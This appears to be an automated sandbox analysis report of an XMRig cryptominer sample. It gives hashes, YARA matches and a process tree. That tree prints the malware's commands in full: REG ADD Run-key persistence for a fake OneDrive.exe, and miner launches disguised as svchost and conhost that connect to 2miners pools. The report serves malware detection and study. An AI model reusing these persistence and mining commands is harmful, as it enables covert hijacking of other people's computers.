Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
22-12-2024 05:48
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe
Resource
win10v2004-20241007-en
General
-
Target
JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe
-
Size
6.6MB
-
MD5
e4ce16957129f0ce094c9eaae8672333
-
SHA1
aed6f0d4abb26ee4df7814a14fa59fcb0fb2f013
-
SHA256
4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d
-
SHA512
c6c51a3345c191ef694b595406665e9b31ba935de10dcd6be7c6bcf46c158a4a5e58b5e21ebd59a15207dec2feb7a45ddfbb8d6ba21f56c57423bd895c63228d
-
SSDEEP
196608:NERwPy8YGUdxPSgB/aSoJxJgczOLX5UNm2m31BNL/Ys2tIs+:KRwK8YGMq+V0D7zOL/1BNLgfIP
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 7 IoCs
resource yara_rule behavioral2/memory/1784-53-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/1784-54-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/1784-56-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/1784-60-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/1784-59-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/1784-58-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig behavioral2/memory/1784-57-0x0000000140000000-0x00000001407DD000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 3508 OneDrive.exe -
Loads dropped DLL 1 IoCs
pid Process 3508 OneDrive.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" REG.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ipinfo.io -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2656 set thread context of 5032 2656 JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe 83 PID 3508 set thread context of 2792 3508 OneDrive.exe 91 PID 3508 set thread context of 1784 3508 OneDrive.exe 98 -
resource yara_rule behavioral2/memory/2792-51-0x0000000140000000-0x0000000142B59000-memory.dmp upx behavioral2/memory/2792-52-0x0000000140000000-0x0000000142B59000-memory.dmp upx -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language REG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language REG.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 3164 REG.exe 1928 REG.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5032 AppLaunch.exe 5032 AppLaunch.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe 3508 OneDrive.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 1784 conhost.exe Token: SeLockMemoryPrivilege 1784 conhost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1784 conhost.exe -
Suspicious use of WriteProcessMemory 47 IoCs
description pid Process procid_target PID 2656 wrote to memory of 5032 2656 JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe 83 PID 2656 wrote to memory of 5032 2656 JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe 83 PID 2656 wrote to memory of 5032 2656 JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe 83 PID 2656 wrote to memory of 5032 2656 JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe 83 PID 2656 wrote to memory of 5032 2656 JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe 83 PID 5032 wrote to memory of 3508 5032 AppLaunch.exe 84 PID 5032 wrote to memory of 3508 5032 AppLaunch.exe 84 PID 5032 wrote to memory of 3164 5032 AppLaunch.exe 85 PID 5032 wrote to memory of 3164 5032 AppLaunch.exe 85 PID 5032 wrote to memory of 3164 5032 AppLaunch.exe 85 PID 5032 wrote to memory of 1928 5032 AppLaunch.exe 86 PID 5032 wrote to memory of 1928 5032 AppLaunch.exe 86 PID 5032 wrote to memory of 1928 5032 AppLaunch.exe 86 PID 3508 wrote to memory of 2792 3508 OneDrive.exe 91 PID 3508 wrote to memory of 2792 3508 OneDrive.exe 91 PID 3508 wrote to memory of 2792 3508 OneDrive.exe 91 PID 3508 wrote to memory of 2792 3508 OneDrive.exe 91 PID 3508 wrote to memory of 2792 3508 OneDrive.exe 91 PID 3508 wrote to memory of 2792 3508 OneDrive.exe 91 PID 3508 wrote to memory of 2792 3508 OneDrive.exe 91 PID 3508 wrote to memory of 2792 3508 OneDrive.exe 91 PID 3508 wrote to memory of 2792 3508 OneDrive.exe 91 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98 PID 3508 wrote to memory of 1784 3508 OneDrive.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_4c0e74a2eb39808b4abd6107e7dcc17a27d9b80d014aac1fedf58e8fda231c9d.exe"1⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5032 -
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe --algo ETCHASH --pool etc.2miners.com:1010 --user 0x5E91C51e70b18e904fd29dB42442B29959ADeF7F.TestEasy4⤵PID:2792
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe -o xmr.2miners.com:2222 -u XMR_ADDRESS -p "TestEasy"4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1784
-
-
-
C:\Windows\SysWOW64\REG.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /f /d C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3164
-
-
C:\Windows\SysWOW64\REG.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v OneDrive /t REG_BINARY /f /d 0200000000000000000000003⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:1928
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
133B
MD5b4a9904489c912c0ca3df039458c0aa3
SHA1590860d91a576b1ea488416ebbe0c6f3f4f60d97
SHA256c7747a2eef363b46c9329e13018540bb99e6d088baa1a89526c4159ee3c09d74
SHA51274ee4610e4ee2e4dbba872f6f471f8bf41dc00019b817f9aa54a0a39e16103100772e39923de6e36155860d6791a29b9cbd0e4306f6fdc46f6bcd7a9163817c7
-
Filesize
175KB
MD5f3af73070387fb75b19286826cc3126c
SHA17774854137d7ada89f3b4bdf67631456a1e74853
SHA256974243f2487ceeb8eeea6aa8fee215f15c7b204382d4bd12f469f712f56c3610
SHA512a620583b2d89e3f0350ae4d5dfe2b2c160d2f982b29dea6b8e273bb39ab2d1d91a2452238e9c30cdd7151aa555e231e1ac9930f9d76f6ff80504eacb25fa557a
-
Filesize
316KB
MD5fed6517a5f84eecc29edee5586d7feeb
SHA156df244bf73c7ec7b59c98e1f5d47b379b58a06b
SHA2565075a0587b1b35c0152d8c44468641d0ab1c52fd8f1814ee257eceb9ffcb89b6
SHA51245cab4395d509b5d7dfb904e84d5a679440412f494c4970191b5882572f4d1b9c9cd28d41a49619353c405c2477153b4a7a1568fcf307709df0b81b38c405642